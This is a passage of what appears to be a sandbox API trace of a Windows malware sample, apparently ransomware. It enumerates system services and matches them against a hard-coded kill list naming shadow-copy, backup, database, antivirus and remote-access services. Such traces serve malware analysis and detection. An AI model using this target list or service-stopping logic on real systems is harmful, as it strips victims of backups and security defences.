(lpFirst="DeviceAssociationService", lpSrch="vss") returned 0x0 [0139.582] StrStrIA (lpFirst="DeviceInstall", lpSrch="vss") returned 0x0 [0139.582] StrStrIA (lpFirst="DevQueryBroker", lpSrch="vss") returned 0x0 [0139.582] StrStrIA (lpFirst="Dfsc", lpSrch="vss") returned 0x0 [0139.582] StrStrIA (lpFirst="Dhcp", lpSrch="vss") returned 0x0 [0139.582] StrStrIA (lpFirst="diagnosticshub.standardcollector.service", lpSrch="vss") returned 0x0 [0139.582] StrStrIA (lpFirst="DiagTrack", lpSrch="vss") returned 0x0 [0139.582] StrStrIA (lpFirst="Disk", lpSrch="vss") returned 0x0 [0139.582] StrStrIA (lpFirst="DmEnrollmentSvc", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="dmvsc", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="dmwappushservice", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="Dnscache", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="DoSvc", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="dot3svc", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="DPS", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="drmkaud", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="DsmSvc", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="DsSvc", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="DusmSvc", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="DXGKrnl", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="e1iexpress", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="EapHost", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="ebdrv", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="EFS", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="EhStorClass", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="EhStorTcgDrv", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="embeddedmode", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="EntAppSvc", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="ErrDev", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="EventLog", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="EventSystem", lpSrch="vss") returned 0x0 [0139.583] StrStrIA (lpFirst="exfat", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="fastfat", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="Fax", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="fdc", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="fdPHost", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="FDResPub", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="fhsvc", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="FileCrypt", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="FileInfo", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="Filetrace", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="flpydisk", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="FltMgr", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="FontCache", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="FontCache3.0.0.0", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="FrameServer", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="FsDepends", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="fvevol", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="gencounter", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="genericusbfn", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="GPIOClx0101", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="gpsvc", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="GpuEnergyDrv", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="gupdate", lpSrch="vss") returned 0x0 [0139.584] StrStrIA (lpFirst="gupdatem", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="HdAudAddService", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="HDAudBus", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="HidBatt", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="HidBth", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="hidi2c", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="hidinterrupt", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="HidIr", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="hidserv", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="HidUsb", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="HomeGroupListener", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="HomeGroupProvider", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="HpSAMD", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="HTTP", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="HvHost", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="hvservice", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="hwpolicy", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="hyperkbd", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="i8042prt", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="iagpio", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="iai2c", lpSrch="vss") returned 0x0 [0139.585] StrStrIA (lpFirst="iaLPSS2i_GPIO2", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="iaLPSS2i_GPIO2_BXT_P", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="iaLPSS2i_I2C", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="iaLPSS2i_I2C_BXT_P", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="iaLPSSi_GPIO", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="iaLPSSi_I2C", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="iaStorAV", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="iaStorV", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="ibbus", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="icssvc", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="IKEEXT", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="IndirectKmd", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="intelide", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="intelpep", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="intelppm", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="iorate", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="IpFilterDriver", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="iphlpsvc", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="IPMIDRV", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="IPNAT", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="IpxlatCfgSvc", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="irda", lpSrch="vss") returned 0x0 [0139.586] StrStrIA (lpFirst="IRENUM", lpSrch="vss") returned 0x0 [0139.587] StrStrIA (lpFirst="irmon", lpSrch="vss") returned 0x0 [0139.587] StrStrIA (lpFirst="isapnp", lpSrch="vss") returned 0x0 [0139.587] StrStrIA (lpFirst="iScsiPrt", lpSrch="vss") returned 0x0 [0139.587] StrStrIA (lpFirst="kbdclass", lpSrch="vss") returned 0x0 [0139.587] StrStrIA (lpFirst="kbdhid", lpSrch="vss") returned 0x0 [0139.587] StrStrIA (lpFirst="kdnic", lpSrch="vss") returned 0x0 [0139.587] StrStrIA (lpFirst="KeyIso", lpSrch="vss") returned 0x0 [0139.587] StrStrIA (lpFirst="KSecDD", lpSrch="vss") returned 0x0 [0139.587] StrStrIA (lpFirst="KSecPkg", lpSrch="vss") returned 0x0 [0139.587] StrStrIA (lpFirst="ksthunk", lpSrch="vss") returned 0x0 [0139.587] StrStrIA (lpFirst="KtmRm", lpSrch="vss") returned 0x0 [0139.587] StrStrIA (lpFirst="LanmanServer", lpSrch="vss") returned 0x0 [0139.588] StrStrIA (lpFirst="LanmanWorkstation", lpSrch="vss") returned 0x0 [0139.588] StrStrIA (lpFirst="lfsvc", lpSrch="vss") returned 0x0 [0139.588] StrStrIA (lpFirst="LicenseManager", lpSrch="vss") returned 0x0 [0139.588] StrStrIA (lpFirst="lltdio", lpSrch="vss") returned 0x0 [0139.588] StrStrIA (lpFirst="lltdsvc", lpSrch="vss") returned 0x0 [0139.588] StrStrIA (lpFirst="lmhosts", lpSrch="vss") returned 0x0 [0139.588] StrStrIA (lpFirst="LSI_SAS", lpSrch="vss") returned 0x0 [0139.588] StrStrIA (lpFirst="LSI_SAS2i", lpSrch="vss") returned 0x0 [0139.588] StrStrIA (lpFirst="LSI_SAS3i", lpSrch="vss") returned 0x0 [0139.588] StrStrIA (lpFirst="LSI_SSS", lpSrch="vss") returned 0x0 [0139.588] StrStrIA (lpFirst="LSM", lpSrch="vss") returned 0x0 [0139.588] StrStrIA (lpFirst="luafv", lpSrch="vss") returned 0x0 [0139.588] StrStrIA (lpFirst="MapsBroker", lpSrch="vss") returned 0x0 [0139.588] StrStrIA (lpFirst="mausbhost", lpSrch="vss") returned 0x0 [0139.588] StrStrIA (lpFirst="mausbip", lpSrch="vss") returned 0x0 [0139.588] StrStrIA (lpFirst="megasas", lpSrch="vss") returned 0x0 [0139.589] StrStrIA (lpFirst="megasas2i", lpSrch="vss") returned 0x0 [0139.589] StrStrIA (lpFirst="megasr", lpSrch="vss") returned 0x0 [0139.589] StrStrIA (lpFirst="mlx4_bus", lpSrch="vss") returned 0x0 [0139.589] StrStrIA (lpFirst="MMCSS", lpSrch="vss") returned 0x0 [0139.589] StrStrIA (lpFirst="Modem", lpSrch="vss") returned 0x0 [0139.589] StrStrIA (lpFirst="monitor", lpSrch="vss") returned 0x0 [0139.589] StrStrIA (lpFirst="mouclass", lpSrch="vss") returned 0x0 [0139.589] StrStrIA (lpFirst="mouhid", lpSrch="vss") returned 0x0 [0139.589] StrStrIA (lpFirst="mountmgr", lpSrch="vss") returned 0x0 [0139.589] StrStrIA (lpFirst="MozillaMaintenance", lpSrch="vss") returned 0x0 [0139.589] StrStrIA (lpFirst="mpsdrv", lpSrch="vss") returned 0x0 [0139.589] StrStrIA (lpFirst="MpsSvc", lpSrch="vss") returned 0x0 [0139.589] StrStrIA (lpFirst="MRxDAV", lpSrch="vss") returned 0x0 [0139.589] StrStrIA (lpFirst="mrxsmb", lpSrch="vss") returned 0x0 [0139.589] StrStrIA (lpFirst="mrxsmb10", lpSrch="vss") returned 0x0 [0139.589] StrStrIA (lpFirst="mrxsmb20", lpSrch="vss") returned 0x0 [0139.589] StrStrIA (lpFirst="MsBridge", lpSrch="vss") returned 0x0 [0139.589] StrStrIA (lpFirst="MSDTC", lpSrch="vss") returned 0x0 [0139.590] StrStrIA (lpFirst="Msfs", lpSrch="vss") returned 0x0 [0139.590] StrStrIA (lpFirst="msgpiowin32", lpSrch="vss") returned 0x0 [0139.590] StrStrIA (lpFirst="mshidkmdf", lpSrch="vss") returned 0x0 [0139.590] StrStrIA (lpFirst="mshidumdf", lpSrch="vss") returned 0x0 [0139.590] StrStrIA (lpFirst="msisadrv", lpSrch="vss") returned 0x0 [0139.590] StrStrIA (lpFirst="MSiSCSI", lpSrch="vss") returned 0x0 [0139.590] StrStrIA (lpFirst="msiserver", lpSrch="vss") returned 0x0 [0139.590] StrStrIA (lpFirst="MSKSSRV", lpSrch="vss") returned 0x0 [0139.590] StrStrIA (lpFirst="MsLldp", lpSrch="vss") returned 0x0 [0139.590] StrStrIA (lpFirst="MSPCLOCK", lpSrch="vss") returned 0x0 [0139.590] StrStrIA (lpFirst="MSPQM", lpSrch="vss") returned 0x0 [0139.590] StrStrIA (lpFirst="MsRPC", lpSrch="vss") returned 0x0 [0139.590] StrStrIA (lpFirst="MsSecFlt", lpSrch="vss") returned 0x0 [0139.590] StrStrIA (lpFirst="mssmbios", lpSrch="vss") returned 0x0 [0139.590] StrStrIA (lpFirst="MSTEE", lpSrch="vss") returned 0x0 [0139.590] StrStrIA (lpFirst="MTConfig", lpSrch="vss") returned 0x0 [0139.590] StrStrIA (lpFirst="Mup", lpSrch="vss") returned 0x0 [0139.590] StrStrIA (lpFirst="mvumis", lpSrch="vss") returned 0x0 [0139.590] StrStrIA (lpFirst="NativeWifiP", lpSrch="vss") returned 0x0 [0139.591] StrStrIA (lpFirst="NaturalAuthentication", lpSrch="vss") returned 0x0 [0139.591] StrStrIA (lpFirst="NcaSvc", lpSrch="vss") returned 0x0 [0139.591] StrStrIA (lpFirst="NcbService", lpSrch="vss") returned 0x0 [0139.591] StrStrIA (lpFirst="NcdAutoSetup", lpSrch="vss") returned 0x0 [0139.592] OpenServiceA (hSCManager=0x35858a0, lpServiceName="vmicvss", dwDesiredAccess=0x2c) returned 0x3585990 [0139.592] QueryServiceStatusEx (in: hService=0x3585990, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0139.593] CloseServiceHandle (hSCObject=0x3585990) returned 1 [0139.593] OpenServiceA (hSCManager=0x35858a0, lpServiceName="VSS", dwDesiredAccess=0x2c) returned 0x3585be8 [0139.594] QueryServiceStatusEx (in: hService=0x3585be8, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0139.594] CloseServiceHandle (hSCObject=0x3585be8) returned 1 [0139.838] OpenServiceA (hSCManager=0x35858a0, lpServiceName="cdfs", dwDesiredAccess=0x2c) returned 0x3585c60 [0139.839] QueryServiceStatusEx (in: hService=0x3585c60, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0139.840] CloseServiceHandle (hSCObject=0x3585c60) returned 1 [0139.840] OpenServiceA (hSCManager=0x35858a0, lpServiceName="Dfsc", dwDesiredAccess=0x2c) returned 0x3585990 [0139.840] QueryServiceStatusEx (in: hService=0x3585990, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0139.841] Sleep (dwMilliseconds=0x3e8) [0141.494] QueryServiceStatusEx (in: hService=0x3585990, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0141.497] GetTickCount () returned 0x1164444 [0141.497] CloseServiceHandle (hSCObject=0x3585990) returned 1 [0141.498] OpenServiceA (hSCManager=0x35858a0, lpServiceName="udfs", dwDesiredAccess=0x2c) returned 0x3585aa8 [0141.500] QueryServiceStatusEx (in: hService=0x3585aa8, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0141.500] CloseServiceHandle (hSCObject=0x3585aa8) returned 1 [0141.501] OpenServiceA (hSCManager=0x35858a0, lpServiceName="wudfsvc", dwDesiredAccess=0x2c) returned 0x3585800 [0141.501] QueryServiceStatusEx (in: hService=0x3585800, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0141.502] CloseServiceHandle (hSCObject=0x3585800) returned 1 [0141.788] OpenServiceA (hSCManager=0x35858a0, lpServiceName="wbengine", dwDesiredAccess=0x2c) returned 0x3585aa8 [0141.790] QueryServiceStatusEx (in: hService=0x3585aa8, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0141.791] CloseServiceHandle (hSCObject=0x3585aa8) returned 1 [0141.806] GetProcessHeap () returned 0x3520000 [0141.808] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3586780 | out: hHeap=0x3520000) returned 1 [0141.808] CloseServiceHandle (hSCObject=0x35858a0) returned 1 [0141.809] SetEvent (hEvent=0x20c) returned 1 [0141.809] Sleep (dwMilliseconds=0x2710) [0152.093] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x3585be8 [0152.097] EnumServicesStatusA (in: hSCManager=0x3585be8, dwServiceType=0x3b, dwServiceState=0x3, lpServices=0x553fdc0, cbBufSize=0x24, pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64 | out: lpServices=0x553fdc0*(lpServiceName=0x0, lpDisplayName=0x0, ServiceStatus.dwServiceType=0x0, ServiceStatus.dwCurrentState=0x0, ServiceStatus.dwControlsAccepted=0x0, ServiceStatus.dwWin32ExitCode=0x0, ServiceStatus.dwServiceSpecificExitCode=0x0, ServiceStatus.dwCheckPoint=0x0, ServiceStatus.dwWaitHint=0x0), pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64) returned 0 [0152.101] GetLastError () returned 0xea [0152.101] GetProcessHeap () returned 0x3520000 [0152.101] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xead4) returned 0x3586780 [0152.103] EnumServicesStatusA (in: hSCManager=0x3585be8, dwServiceType=0x3b, dwServiceState=0x3, lpServices=0x3586780, cbBufSize=0xead4, pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64 | out: lpServices=0x3586780*(lpServiceName="1394ohci", lpDisplayName="1394 OHCI Compliant Host Controller", ServiceStatus.dwServiceType=0x1, ServiceStatus.dwCurrentState=0x1, ServiceStatus.dwControlsAccepted=0x0, ServiceStatus.dwWin32ExitCode=0x435, ServiceStatus.dwServiceSpecificExitCode=0x0, ServiceStatus.dwCheckPoint=0x0, ServiceStatus.dwWaitHint=0x0), pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64) returned 1 [0152.253] lstrcpyA (in: lpString1=0x553f9c0, lpString2="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v" | out: lpString1="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v") returned="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v" [0152.253] StrStrIA (lpFirst="1394ohci", lpSrch="vss") returned 0x0 [0152.254] StrStrIA (lpFirst="3ware", lpSrch="vss") returned 0x0 [0152.254] StrStrIA (lpFirst="ACPI", lpSrch="vss") returned 0x0 [0152.254] StrStrIA (lpFirst="AcpiDev", lpSrch="vss") returned 0x0 [0152.254] StrStrIA (lpFirst="acpiex", lpSrch="vss") returned 0x0 [0152.254] StrStrIA (lpFirst="acpipagr", lpSrch="vss") returned 0x0 [0152.254] StrStrIA (lpFirst="AcpiPmi", lpSrch="vss") returned 0x0 [0152.254] StrStrIA (lpFirst="acpitime", lpSrch="vss") returned 0x0 [0152.254] StrStrIA (lpFirst="AdobeARMservice", lpSrch="vss") returned 0x0 [0152.254] StrStrIA (lpFirst="ADP80XX", lpSrch="vss") returned 0x0 [0152.254] StrStrIA (lpFirst="AFD", lpSrch="vss") returned 0x0 [0152.254] StrStrIA (lpFirst="ahcache", lpSrch="vss") returned 0x0 [0152.254] StrStrIA (lpFirst="AJRouter", lpSrch="vss") returned 0x0 [0152.254] StrStrIA (lpFirst="ALG", lpSrch="vss") returned 0x0 [0152.254] StrStrIA (lpFirst="AmdK8", lpSrch="vss") returned 0x0 [0152.254] StrStrIA (lpFirst="AmdPPM", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="amdsata", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="amdsbs", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="amdxata", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="AppID", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="AppIDSvc", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="Appinfo", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="applockerfltr", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="AppMgmt", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="AppReadiness", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="AppVClient", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="AppvStrm", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="AppvVemgr", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="AppvVfs", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="AppXSvc", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="arcsas", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="AsyncMac", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="atapi", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="AudioEndpointBuilder", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="Audiosrv", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="AxInstSV", lpSrch="vss") returned 0x0 [0152.255] StrStrIA (lpFirst="b06bdrv", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="BasicDisplay", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="BasicRender", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="bcmfn", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="bcmfn2", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="BDESVC", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="Beep", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="BFE", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="BITS", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="bowser", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="BrokerInfrastructure", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="Browser", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="BthAvrcpTg", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="BthHFEnum", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="bthhfhid", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="BthHFSrv", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="BTHMODEM", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="bthserv", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="buttonconverter", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="CAD", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="CapImg", lpSrch="vss") returned 0x0 [0152.256] StrStrIA (lpFirst="cdfs", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="CDPSvc", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="cdrom", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="CertPropSvc", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="cht4iscsi", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="cht4vbd", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="circlass", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="CldFlt", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="CLFS", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="ClickToRunSvc", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="ClipSVC", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="clreg", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="CmBatt", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="CNG", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="cnghwassist", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="CompositeBus", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="COMSysApp", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="condrv", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="CoreMessagingRegistrar", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="CryptSvc", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="CSC", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="CscService", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="dam", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="DcomLaunch", lpSrch="vss") returned 0x0 [0152.257] StrStrIA (lpFirst="defragsvc", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="DeviceAssociationService", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="DeviceInstall", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="DevQueryBroker", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="Dfsc", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="Dhcp", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="diagnosticshub.standardcollector.service", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="DiagTrack", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="Disk", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="DmEnrollmentSvc", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="dmvsc", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="dmwappushservice", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="Dnscache", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="DoSvc", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="dot3svc", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="DPS", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="drmkaud", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="DsmSvc", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="DsSvc", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="DusmSvc", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="DXGKrnl", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="e1iexpress", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="EapHost", lpSrch="vss") returned 0x0 [0152.258] StrStrIA (lpFirst="ebdrv", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="EFS", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="EhStorClass", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="EhStorTcgDrv", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="embeddedmode", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="EntAppSvc", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="ErrDev", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="EventLog", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="EventSystem", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="exfat", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="fastfat", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="Fax", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="fdc", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="fdPHost", lpSrch="vss") returned 0x0 [0152.259] StrStrIA 